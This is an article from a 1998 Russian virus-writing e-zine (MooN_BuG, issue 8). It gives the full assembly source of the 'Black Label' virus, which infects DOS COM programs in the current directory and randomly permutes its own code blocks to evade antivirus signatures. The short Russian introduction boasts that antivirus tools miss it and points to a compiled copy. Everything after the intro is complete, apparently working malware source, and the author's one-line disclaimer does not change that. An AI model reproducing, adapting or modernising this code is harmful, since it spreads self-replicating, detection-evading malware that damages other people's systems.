[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 8, Nov 1998 file 008
Вирус "Black Label"
by RedArc
Вирус pазмером в 1594 байта, инфицирует COM-программы в текущем каталоге.
При инфицировании первый блок в точке входа выбирает случайным образом из трех
возможных. Остальные блоки переставляет местами опять же случайным образом. В
конце вируса присутствует таблица, в которой записаны смещения и длины блоков.
Хоть таблица и находится в фиксированном месте зверька, но сигнатурой она вряд
ли сможет послужить, так как меняется от копии к копии. Глюки вроде бы все
выловил, антивирусы зверька не видят.
Короче, смотрите сами. Откомпилированный Black Label лежит в том же
каталоге (файл bl_label.com), где в журнале по традиции лежат все проги
аналогичного назначения.
Ну и на последок. Не применяйте вирусов во вред кому-либо. Это не хорошо.
Лучше постарайтесь заставить себя мыслить немного по другому, нежели это
предполагают стандарты, и учитесь, учитесь, учитесь...
=== Cut ===
;Virus "Black Label" (c) 1998 by RedArc
Model Tiny
.code
.386
org 100h
MyIntNum equ 03h
start:
jmp EntryPoint
db 0adh
db 100h dup (90h)
mov ax,4c00h
int 21h
EntryPoint:
pusha
mov bp,word ptr ds:[si+1]
add bp,103h
EPOFS equ $-EntryPoint
EPLAB:
mov di,bp
add di,Tabelle
mov ax,word ptr ds:[di]
add ax,bp
push ax
EPLEN equ $-EPLAB
ret
Begin_Length equ $-EntryPoint
o00 equ $-EntryPoint
@@00:
xor ax,ax
mov ds,ax
mov ax,word ptr cs:[di+3*4]
add ax,bp
cli
mov word ptr ds:[MyIntNum*4],ax
mov word ptr ds:[MyIntNum*4+2],cs
sti
mov di,1
int MyIntNum
push di
ret
l00 equ $-@@00
o01 equ $-EntryPoint
@@01:
mov ah,77h
xchg al,ah
lbl0:
in al,40h
cmp al,77h
jne lbl0
xchg al,ah
mov di,2
int MyIntNum
push di
ret
l01 equ $-@@01
o02 equ $-EntryPoint
@@02:
xor cx,cx
push cx
popf
pushf
pop cx
cmp cl,2
jz LBL2
LBL1:
inc di
int MyIntNum
jmp LBL1
LBL2:
push cs
pop ds
mov di,4
int MyIntNum
push di
ret
l02 equ $-@@02
o03 equ $-EntryPoint
@@03:
push ax
shl di,2
add di,bp
add di,Tabelle
mov ax,word ptr cs:[di]
add ax,bp
xchg di,ax
pop ax
iret
l03 equ $-@@03
o04 equ $-EntryPoint
@@04:
mov ax,3d3dh
xor ax,0adadh
mov di,5
int MyIntNum
push di
ret
l04 equ $-@@04
o05 equ $-EntryPoint
@@05:
mov word ptr ds:[si],ax
mov di,6
int MyIntNum
push di
ret
l05 equ $-@@05
o06 equ $-EntryPoint
@@06:
mov ax,3d3dh
xor ax,0adadh
mov di,7
int MyIntNum
push di
ret
l06 equ $-@@06
o07 equ $-EntryPoint
@@07:
mov word ptr ds:[si+2],ax
mov di,8
int MyIntNum
push di
ret
l07 equ $-@@07
o08 equ $-EntryPoint
@@08:
mov ah,1ah
mov di,9
int MyIntNum
push di
ret
l08 equ $-@@08
o09 equ $-EntryPoint
@@09:
mov dx,bp
mov di,0ah
int MyIntNum
push di
ret
l09 equ $-@@09
o0a equ $-EntryPoint
@@0a:
add dx,VirLength+TabelleLength+2
mov di,0bh
int MyIntNum
push di
ret
l0a equ $-@@0a
o0b equ $-EntryPoint
@@0b:
int 21h
mov di,0ch
int MyIntNum
push di
ret
l0b equ $-@@0b
o0c equ $-EntryPoint
@@0c:
mov ah,4eh
mov di,0dh
int MyIntNum
push di
ret
l0c equ $-@@0c
o0d equ $-EntryPoint
@@0d:
push ax cx
mov di,54h
int MyIntNum
mov cx,6
LBL_0:
mov al,byte ptr ds:[di]
xor al,0adh
mov byte ptr ds:[di],al
inc di
loop LBL_0
pop cx ax
mov di,0eh
int MyIntNum
push di
ret
l0d equ $-@@0d
o0e equ $-EntryPoint
@@0e:
mov di,54h
int MyIntNum
mov dx,di
mov di,0fh
int MyIntNum
push di
ret
l0e equ $-@@0e
o0f equ $-EntryPoint
@@0f:
mov di,10h
mov cx,0feh
int MyIntNum
push di
ret
l0f equ $-@@0f
o10 equ $-EntryPoint
@@10:
int 21h
mov di,11h
int MyIntNum
push di
ret
l10 equ $-@@10
o11 equ $-EntryPoint
@@11:
jnb LBL3
mov di,13h
int MyIntNum
push di
ret
LBL3:
mov di,12h
int MyIntNum
push di
ret
l11 equ $-@@11
o12 equ $-EntryPoint
@@12:
push ax cx
mov di,54h
int MyIntNum
mov cx,6
mov al,byte ptr ds:[di]
cmp al,'*'
jne LBL_B
LBL_K:
mov al,byte ptr ds:[di]
xor al,0adh
mov byte ptr ds:[di],al
inc di
loop LBL_K
LBL_B:
pop cx ax
mov di,19h
int MyIntNum
push di
ret
l12 equ $-@@12
o13 equ $-EntryPoint
@@13:
mov ah,1ah
mov di,14h
int MyIntNum
push di
ret
l13 equ $-@@13
o14 equ $-EntryPoint
@@14:
mov di,15h
mov dx,80h
int MyIntNum
push di
ret
l14 equ $-@@14
o15 equ $-EntryPoint
@@15:
int 21h
mov di,16h
int MyIntNum
push di
ret
l15 equ $-@@15
o16 equ $-EntryPoint
@@16:
popa
push si
ret
l16 equ $-@@16
o17 equ $-EntryPoint
@@17:
push ax
mov di,55h
int MyIntNum
mov ax,word ptr ds:[di]
xor ax,0adadh
mov di,4
int MyIntNum
mov word ptr ds:[di+1],ax
pop ax
mov di,53h
int MyIntNum
push di
ret
l17 equ $-@@17
o18 equ $-EntryPoint
@@18:
push ax cx si
mov ah,3h
xchg al,ah
H_RND:
in al,40h
cmp al,3h
jnc H_RND
cmp al,2
je RRRRR1
cmp al,1
je RRRRR2
cmp al,0
je RRRRR3
jmp H_RND
RRRRR1:
mov di,5fh
int MyIntNum
jmp RRRRR4
RRRRR2:
mov di,48h
int MyIntNum
jmp RRRRR4
RRRRR3:
mov di,18h
int MyIntNum
add di,R_DateOffs
RRRRR4:
mov si,bp
add si,EPOFS
mov cx,EPLEN
cld
xchg si,di
rep movsb
pop si cx ax
mov di,43h
int MyIntNum
push di
ret
R_DateOffs equ $-@@18
mov di,bp
add di,Tabelle
mov ax,word ptr ds:[di]
add ax,bp
push ax
l18 equ $-@@18
o19 equ $-EntryPoint
@@19:
mov ah,2fh
mov di,1ah
int MyIntNum
push di
ret
l19 equ $-@@19
o1a equ $-EntryPoint
@@1a:
int 21h
push di
mov di,1bh
int MyIntNum
push di
ret
l1a equ $-@@1a
o1b equ $-EntryPoint
@@1b:
pop di
xchg bx,di
push di
mov di,1ch
int MyIntNum
push di
ret
l1b equ $-@@1b
o1c equ $-EntryPoint
@@1c:
pop di
mov dx,di
push di
mov di,1dh
int MyIntNum
push di
ret
l1c equ $-@@1c
o1d equ $-EntryPoint
@@1d:
add dx,1eh
mov di,1eh
int MyIntNum
push di
ret
l1d equ $-@@1d
o1e equ $-EntryPoint
@@1e:
mov ax,4301h
mov di,1fh
int MyIntNum
push di
ret
l1e equ $-@@1e
o1f equ $-EntryPoint
@@1f:
xor cx,cx
mov di,20h
int MyIntNum
push di
ret
l1f equ $-@@1f
o20 equ $-EntryPoint
@@20:
int 21h
mov di,21h
int MyIntNum
push di
ret
l20 equ $-@@20
o21 equ $-EntryPoint
@@21:
mov ax,3d02h
mov di,22h
int MyIntNum
push di
ret
l21 equ $-@@21
o22 equ $-EntryPoint
@@22:
int 21h
mov di,23h
int MyIntNum
push di
ret
l22 equ $-@@22
o23 equ $-EntryPoint
@@23:
xchg bx,ax
mov di,24h
int MyIntNum
push di
ret
l23 equ $-@@23
o24 equ $-EntryPoint
@@24:
mov ah,3fh
mov di,26h
int MyIntNum
push di
ret
l24 equ $-@@24
o25 equ $-EntryPoint
@@25:
push ax
mov di,55h
int MyIntNum
mov word ptr ds:[di],cs
mov word ptr ds:[di+2],cs
pop ax
mov di,41h
int MyIntNum
push di
ret
l25 equ $-@@25
o26 equ $-EntryPoint
@@26:
mov di,55h
int MyIntNum
xchg dx,di
mov di,27h
int MyIntNum
push di
ret
l26 equ $-@@26
o27 equ $-EntryPoint
@@27:
mov cx,4
mov di,28h
int MyIntNum
push di
ret
l27 equ $-@@27
o28 equ $-EntryPoint
@@28:
int 21h
mov di,29h
int MyIntNum
push di
ret
l28 equ $-@@28
o29 equ $-EntryPoint
@@29:
mov di,55h
int MyIntNum
mov al,byte ptr ds:[di+3]
mov di,2ah
int MyIntNum
push di
ret
l29 equ $-@@29
o2a equ $-EntryPoint
@@2a:
cmp al,0adh
mov di,2bh
int MyIntNum
push di
ret
l2a equ $-@@2a
o2b equ $-EntryPoint
@@2b:
jz LBL_5
mov di,39h
int MyIntNum
push di
ret
LBL_5:
mov di,2ch
int MyIntNum
push di
ret
l2b equ $-@@2b
o2c equ $-EntryPoint
@@2c:
mov ax,5701h
mov di,2dh
int MyIntNum
push di
ret
l2c equ $-@@2c
o2d equ $-EntryPoint
@@2d:
pop di
mov cx,word ptr ds:[di+16h]
push di
mov di,2eh
int MyIntNum
push di
ret
l2d equ $-@@2d
o2e equ $-EntryPoint
@@2e:
pop di
mov dx,word ptr ds:[di+18h]
push di
mov di,2fh
int MyIntNum
push di
ret
l2e equ $-@@2e
o2f equ $-EntryPoint
@@2f:
int 21h
mov di,30h
int MyIntNum
push di
ret
l2f equ $-@@2f
o30 equ $-EntryPoint
@@30:
mov ah,3eh
mov di,31h
int MyIntNum
push di
ret
l30 equ $-@@30
o31 equ $-EntryPoint
@@31:
int 21h
mov di,32h
int MyIntNum
push di
ret
l31 equ $-@@31
o32 equ $-EntryPoint
@@32:
pop di
mov dx,di
push di
mov di,33h
int MyIntNum
push di
ret
l32 equ $-@@32
o33 equ $-EntryPoint
@@33:
add dx,1eh
mov di,34h
int MyIntNum
push di
ret
l33 equ $-@@33
o34 equ $-EntryPoint
@@34:
xor cx,cx
mov di,35h
int MyIntNum
push di
ret
l34 equ $-@@34
o35 equ $-EntryPoint
@@35:
pop di
mov cl, byte ptr ds:[di+15h]
push di
mov di,36h
int MyIntNum
push di
ret
l35 equ $-@@35
o36 equ $-EntryPoint
@@36:
int 21h
mov di,37h
int MyIntNum
push di
ret
l36 equ $-@@36
o37 equ $-EntryPoint
@@37:
mov ah,4fh
mov di,38h
int MyIntNum
push di
ret
l37 equ $-@@37
o38 equ $-EntryPoint
@@38:
pop di
mov di,10h
int MyIntNum
push di
ret
l38 equ $-@@38
o39 equ $-EntryPoint
@@39:
mov ax,4202h
mov di,3ah
int MyIntNum
push di
ret
l39 equ $-@@39
o3a equ $-EntryPoint
@@3a:
xor cx,cx
mov di,3bh
int MyIntNum
push di
ret
l3a equ $-@@3a
o3b equ $-EntryPoint
@@3b:
xor dx,dx
mov di,3ch
int MyIntNum
push di
ret
l3b equ $-@@3b
o3c equ $-EntryPoint
@@3c:
int 21h
mov di,3dh
int MyIntNum
push di
ret
l3c equ $-@@3c
o3d equ $-EntryPoint
@@3d:
cmp ax,0ffffh-VirLength
mov di,3eh
int MyIntNum
push di
ret
l3d equ $-@@3d
o3e equ $-EntryPoint
@@3e:
jb LBL_4
mov di,2ch
int MyIntNum
push di
ret
LBL_4:
mov di,3fh
int MyIntNum
push di
ret
l3e equ $-@@3e
o3f equ $-EntryPoint
@@3f:
push ax
mov di,40h
int MyIntNum
push di
ret
l3f equ $-@@3f
o40 equ $-EntryPoint
@@40:
mov ah,40h
mov di,17h
int MyIntNum
push di
ret
l40 equ $-@@40
o41 equ $-EntryPoint
@@41:
mov dx,bp
mov di,42h
int MyIntNum
push di
ret
l41 equ $-@@41
o42 equ $-EntryPoint
@@42:
mov cx,Begin_Length
mov di,18h
int MyIntNum
push di
ret
l42 equ $-@@42
o43 equ $-EntryPoint
@@43:
int 21h
mov di,57h
int MyIntNum
push di
ret
l43 equ $-@@43
o44 equ $-EntryPoint
@@44:
mov ax,4200h
mov di,45h
int MyIntNum
push di
ret
l44 equ $-@@44
o45 equ $-EntryPoint
@@45:
xor cx,cx
mov di,46h
int MyIntNum
push di
ret
l45 equ $-@@45
o46 equ $-EntryPoint
@@46:
xor dx,dx
mov di,47h
int MyIntNum
push di
ret
l46 equ $-@@46
o47 equ $-EntryPoint
@@47:
int 21h
mov di,49h
int MyIntNum
push di
ret
l47 equ $-@@47
o48 equ $-EntryPoint
@@48:
mov di,bp
add di,Tabelle
mov cx,word ptr ds:[di]
add cx,bp
push cx
l48 equ $-@@48
o49 equ $-EntryPoint
@@49:
mov di,55h
int MyIntNum
xchg si,di
mov di,4ah
int MyIntNum
push di
ret
l49 equ $-@@49
o4a equ $-EntryPoint
@@4a:
mov byte ptr ds:[si],0e9h
mov di,4bh
int MyIntNum
push di
ret
l4a equ $-@@4a
o4b equ $-EntryPoint
@@4b:
pop ax
mov di,4ch
int MyIntNum
push di
ret
l4b equ $-@@4b
o4c equ $-EntryPoint
@@4c:
sub ax,3
mov di,4dh
int MyIntNum
push di
ret
l4c equ $-@@4c
o4d equ $-EntryPoint
@@4d:
mov word ptr ds:[si+1],ax
mov di,4eh
int MyIntNum
push di
ret
l4d equ $-@@4d
o4e equ $-EntryPoint
@@4e:
mov byte ptr ds:[si+3],0adh
mov di,4fh
int MyIntNum
push di
ret
l4e equ $-@@4e
o4f equ $-EntryPoint
@@4f:
mov ah,40h
mov di,50h
int MyIntNum
push di
ret
l4f equ $-@@4f
o50 equ $-EntryPoint
@@50:
mov dx,si
mov di,51h
int MyIntNum
push di
ret
l50 equ $-@@50
o51 equ $-EntryPoint
@@51:
mov cx,4
mov di,52h
int MyIntNum
push di
ret
l51 equ $-@@51
o52 equ $-EntryPoint
@@52:
int 21h
mov di,2ch
int MyIntNum
push di
ret
l52 equ $-@@52
o53 equ $-EntryPoint
@@53:
push ax
mov di,55h
int MyIntNum
mov ax,word ptr ds:[di+2]
xor ax,0adadh
mov di,6
int MyIntNum
mov word ptr ds:[di+1],ax
pop ax
mov di,25h
int MyIntNum
push di
ret
l53 equ $-@@53
o54 equ $-EntryPoint
@@54:
db '*' xor 0adh, '.' xor 0adh, 'c' xor 0adh, 'o' xor 0adh, 'm' xor 0adh, 00h xor 0adh
l54 equ $-@@54
o55 equ $-EntryPoint
@@55:
dw 9090h, 9090h
l55 equ $-@@55
; PerMutator
o56 equ $-EntryPoint
@@56:
mov ah,60h
xchg al,ah
RND:
in al,40h
cmp al,60h
jnc RND
mov di,59h
int MyIntNum
push di
ret
l56 equ $-@@56
o57 equ $-EntryPoint
@@57:
pusha
mov di,bp
add di,Count
xor ax,ax
mov word ptr ds:[di],ax
mov si,bp
add si,NewTabelle
mov cx,TabelleLength
L1:
mov byte ptr ds:[si],00h
inc si
loop L1
mov si,bp
add si,NewTabelle
mov cx,Begin_Length
mov di,58h
int MyIntNum
push di
ret
l57 equ $-@@57
o58 equ $-EntryPoint
@@58:
mov di,56h
int MyIntNum
push di
ret
l58 equ $-@@58
o59 equ $-EntryPoint
@@59:
xor ah,ah
shl ax,2
mov di,bp
add di,ax
add di,NewTabelle
mov dx,word ptr ds:[di]
cmp dx,0
je L2
mov di,58h
int MyIntNum
push di
ret
L2:
mov di,5ah
int MyIntNum
push di
ret
l59 equ $-@@59
o5a equ $-EntryPoint
@@5a:
mov si,bp
add si,ax
add si,NewTabelle
mov word ptr ds:[si],cx
mov di,5bh
int MyIntNum
push di
ret
l5a equ $-@@5a
o5b equ $-EntryPoint
@@5b:
mov di,bp
add di,Tabelle
add di,ax
mov dx,word ptr ds:[di+2]
add cx,dx
mov si,bp
add si,ax
add si,NewTabelle
mov word ptr ds:[si+2],dx
mov di,5ch
int MyIntNum
push di
ret
l5b equ $-@@5b
o5c equ $-EntryPoint
@@5c:
mov di,bp
add di,ax
add di,Tabelle
mov ah,40h
mov dx,word ptr ds:[di]
add dx,bp
push cx
mov cx,word ptr ds:[di+2]
int 21h
pop cx
mov di,5dh
int MyIntNum
push di
ret
l5c equ $-@@5c
o5d equ $-EntryPoint
@@5d:
mov di,bp
add di,Count
mov ax,word ptr ds:[di]
inc ax
cmp ax,060h
je WriteNewTabelle
mov word ptr ds:[di],ax
mov di,58h
int MyIntNum
push di
ret
WriteNewTabelle:
mov di,5eh
int MyIntNum
push di
ret
l5d equ $-@@5d
o5e equ $-EntryPoint
@@5e:
mov dx,bp
add dx,NewTabelle
mov cx,TabelleLength
mov ah,40h
int 21h
popa
mov di,44h
int MyIntNum
push di
ret
l5e equ $-@@5e
o5f equ $-EntryPoint
@@5f:
mov di,bp
add di,Tabelle
mov bx,word ptr ds:[di]
add bx,bp
push bx
l5f equ $-@@5f
Tabelle equ $-EntryPoint
Tabs:
dw o00,l00,o01,l01,o02,l02,o03,l03,o04,l04,o05,l05,o06,l06,o07,l07,o08,l08,o09,l09,o0a,l0a,o0b,l0b,o0c,l0c,o0d,l0d,o0e,l0e,o0f,l0f
dw o10,l10,o11,l11,o12,l12,o13,l13,o14,l14,o15,l15,o16,l16,o17,l17,o18,l18,o19,l19,o1a,l1a,o1b,l1b,o1c,l1c,o1d,l1d,o1e,l1e,o1f,l1f
dw o20,l20,o21,l21,o22,l22,o23,l23,o24,l24,o25,l25,o26,l26,o27,l27,o28,l28,o29,l29,o2a,l2a,o2b,l2b,o2c,l2c,o2d,l2d,o2e,l2e,o2f,l2f
dw o30,l30,o31,l31,o32,l32,o33,l33,o34,l34,o35,l35,o36,l36,o37,l37,o38,l38,o39,l39,o3a,l3a,o3b,l3b,o3c,l3c,o3d,l3d,o3e,l3e,o3f,l3f
dw o40,l40,o41,l41,o42,l42,o43,l43,o44,l44,o45,l45,o46,l46,o47,l47,o48,l48,o49,l49,o4a,l4a,o4b,l4b,o4c,l4c,o4d,l4d,o4e,l4e,o4f,l4f
dw o50,l50,o51,l51,o52,l52,o53,l53,o54,l54,o55,l55,o56,l56,o57,l57,o58,l58,o59,l59,o5a,l5a,o5b,l5b,o5c,l5c,o5d,l5d,o5e,l5e,o5f,l5f
TabelleLength equ $-Tabs
VirLength equ $-EntryPoint
Count equ $-EntryPoint
dw ?
NewTabelle equ $-EntryPoint
end start
=== Cut ===
